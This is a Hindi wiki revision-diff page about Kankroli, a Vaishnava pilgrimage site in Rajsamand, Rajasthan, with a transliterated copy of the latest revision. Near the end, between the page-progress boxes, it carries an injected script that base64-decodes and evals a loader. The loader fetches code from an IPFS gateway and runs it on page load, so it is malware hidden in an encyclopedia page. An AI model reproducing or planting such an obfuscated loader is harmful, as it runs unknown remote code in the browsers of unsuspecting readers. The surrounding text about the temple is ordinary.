Difference between revisions of "कांकड़ोली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
*[[उदयपुर]] [[राजस्थान]] का एक ख़ूबसूरत शहर है और [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।  
+
'''कांकड़ोली''' [[राजस्थान]] राज्य के राजसमन्द में स्थित एक धार्मिक स्थल है।  
*यहाँ की मूर्ति सात स्वरूपों में से एक होने के कारण यह भी वैष्णवों का एक तीर्थ है।  
+
*यहाँ की मूर्ति सात स्वरूपों में से एक होने के कारण यह भी [[वैष्णव|वैष्णवों]] का एक [[तीर्थ]] है।  
*[[नाथद्वारे]] आने वाले वैष्णवों में से कई यहाँ भी दर्शन के लिए जाते हैं।
+
*[[नाथद्वार]] आने वाले वैष्णवों में से कई यहाँ भी दर्शन के लिए जाते हैं।
*यह मूर्ति [[श्रीनाथजी]] से कुछ पहले [[औरंगजेब]] के भय से ही [[मेवाड़]] में लाकर स्थापित की गई थी।  
+
*यह मूर्ति श्रीनाथजी से कुछ पहले [[औरंगजेब]] के भय से ही [[मेवाड़]] में लाकर स्थापित की गई थी।  
 
*यहाँ के गुसाई जी महाराणाओं के वैष्णव गुरु हैं।
 
*यहाँ के गुसाई जी महाराणाओं के वैष्णव गुरु हैं।
{{प्रचार}}
+
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=
Line 14: Line 14:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:उदयपुर]][[Category:उदयपुर_के_पर्यटन_स्थल]][[Category:उदयपुर_के_धार्मिक_स्थल]][[Category:पर्यटन_कोश]]__INDEX__
+
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:राजस्थान_के_धार्मिक_स्थल]]
 +
[[Category:हिन्दू धार्मिक स्थल]][[Category:धार्मिक स्थल कोश]][[Category:पर्यटन_कोश]]
 +
__INDEX__

Latest revision as of 06:59, 12 August 2012

kaank doli rajasthan rajy ke rajasamand mean sthit ek dharmik sthal hai.

  • yahaan ki moorti sat svaroopoan mean se ek hone ke karan yah bhi vaishnavoan ka ek tirth hai.
  • nathadvar ane vale vaishnavoan mean se kee yahaan bhi darshan ke lie jate haian.
  • yah moorti shrinathaji se kuchh pahale aurangajeb ke bhay se hi meva d mean lakar sthapit ki gee thi.
  • yahaan ke gusaee ji maharanaoan ke vaishnav guru haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh